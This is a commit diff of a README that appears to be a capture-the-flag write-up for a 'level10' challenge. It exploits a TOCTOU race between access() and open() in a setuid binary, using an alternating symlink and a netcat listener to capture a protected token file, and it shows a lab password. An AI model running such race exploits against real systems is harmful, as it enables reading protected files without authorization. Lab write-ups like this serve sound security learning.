Skip to content

Commit

Permalink
show READMEs daily
Browse files Browse the repository at this point in the history
  • Loading branch information
nuoxoxo committed Nov 19, 2024
1 parent c9e4973 commit 3354c12
Showing 1 changed file with 42 additions and 42 deletions.
84 changes: 42 additions & 42 deletions README.mdx
Original file line number Diff line number Diff line change
Expand Up @@ -769,7 +769,9 @@ Login
> Password: s5cAJpM8ev6XHw998pRWG728z
```

2 files, regular stuff
Tryout
- 2 files, seen it before
- try - `cat` - `./level10` - `./level10 token localhost`

```b
> ls -l
Expand All @@ -787,21 +789,23 @@ cat: token: Permission denied
You don't have access to ./token
```

ltrace
Problem
- The main issue here is file `./token` - we dont have its permission
- `ltrace` - find out how `./level10` checks permission
- it uses `access()`

```b
> ltrace ./level10 token localhost
__libc_start_main(0x80486d4, 3, 0xbffff7d4, 0x8048970, 0x80489e0 <unfinished ...>
access("token", 4) = -1
^^^^^^ 🟡
printf("You don't have access to %s\n", "token"You don't have access to token
) = 31
+++ exited (status 31) +++
```

`access` - check if user has permissions for a file
- we don't have permission for `token`
- touch a file of our own, try again
- Touch a file of our own, try again

```b
> ./level10 /tmp/tmp localhost
Expand All @@ -816,21 +820,33 @@ fflush(0xb7fd1a20Connecting to localhost:6969 .. ) = 0
^^^^ 🟡
```

Idea
- it eems the program interacts with `localhiost:6969`
- The program interacts with `localhiost:6969`
- we need a valid Host IP :
- `127.0.0.1` or an old trick
- `127.0.0.1`, or the old trick
- `ifconfig | grep 'inet ' | awk 'NR==2 {print $2}' | cut -d ":" -f2`

With correct IP:

```b
> ./level10 /tmp/tmp $(ifconfig | grep 'inet ' | awk 'NR==2 {print $2}' | cut -d ":" -f2)
Connecting to Localhost:6969 .. Connected!
Sending file .. wrote file!
```

Inspect w/ `ltrace`:
nc, ltrace
- it opens and reads and sends out `/tmp/tmp` content
- it sends the content to `Localhost:6969`

```b
# t1
> nc -lk 6969
```
```b
# t2
> ./level10 /tmp/tmp Localhost
> Connecting to Localhost:6969 .. Connected!
Sending file .. wrote file!
```

- we want it to open/read/send the `token` instead!

```b
> ltrace ./level10 /tmp/tmp $(ifconfig | grep 'inet ' | awk 'NR==2 {print $2}' | cut -d ":" -f2)
Expand All @@ -841,7 +857,7 @@ printf("Connected!\nSending file .. "Connected!
) = 27
fflush(0xb7fd1a20Sending file .. ) = 0
open("/tmp/tmp", 0, 010) = 4
^^^^^^^^ 🟡 here is where we hope to force our token in
^^^^^^^^ 🟡 here is where our `token` should be read
read(4, "", 4096) = 0
write(3, "", 0) = 0
Expand All @@ -850,34 +866,19 @@ puts("wrote file!"wrote file!
+++ exited (status 12) +++
```

Maybe it sends content of our file to `localhost:6969`
- try and intercept the content
- for that we use a 2nd terminal

```b
# t1
> nc -lk 6969
```
```b
# t2
> ./level10 /tmp/tmp Localhost
> Connecting to Localhost:6969 .. Connected!
Sending file .. wrote file!
```

Figure out a way to make `./level10` to read the true `token`:
- exploit `access()`'s [TOCTOU](https://stackoverflow.com/questions/75587120/how-to-handle-toctou-problem-between-access-and-unlink) vulnerability
- design a file to do the following:
- when `access()` is called it checks the low-priority file
- after that, `./level10` should `open()` and `read()` the high-priotity one

Solution: \
to trick `access` we need a file that _alternates_ its type
- a file of our own permission level
- a symlink of the same name linked to `token`
- we need an alternation script
Goal
- Figure out a way to force `./level10` to read the true `token`:
- exploit `access()`'s [TOCTOU](https://stackoverflow.com/questions/75587120/how-to-handle-toctou-problem-between-access-and-unlink) vulnerability
- How: let's create a racing condition
- Design a file to do the following:
- force `access()` to check a low-priority file
- then, `open()` and `read()` deal w/ the hi-priority one

👇
Solution:
- we need a file that _alternates_ its own type
- type 1: a symlink to `token`
- type 2: a regular file of our own
- write a script to do this 👇

`alternate.sh`

Expand All @@ -896,8 +897,7 @@ done
#'
```

- a 2nd script to run `alternate` and `./level10` side by side
- a oneliner to unite two previous ones and `netcat`
- Another script to run `alternate` and `./level10` side by side

`runner.sh`

Expand All @@ -911,7 +911,7 @@ done
#'
```

`oneliner`
- Run `./alternate.sh` `./runner.sh` and `netcat` at the same time

```b
> /tmp/alternate.sh 2>/dev/null & /tmp/runner.sh 2>/dev/null & nc -lk 6969
Expand Down

0 comments on commit 3354c12

Please sign in to comment.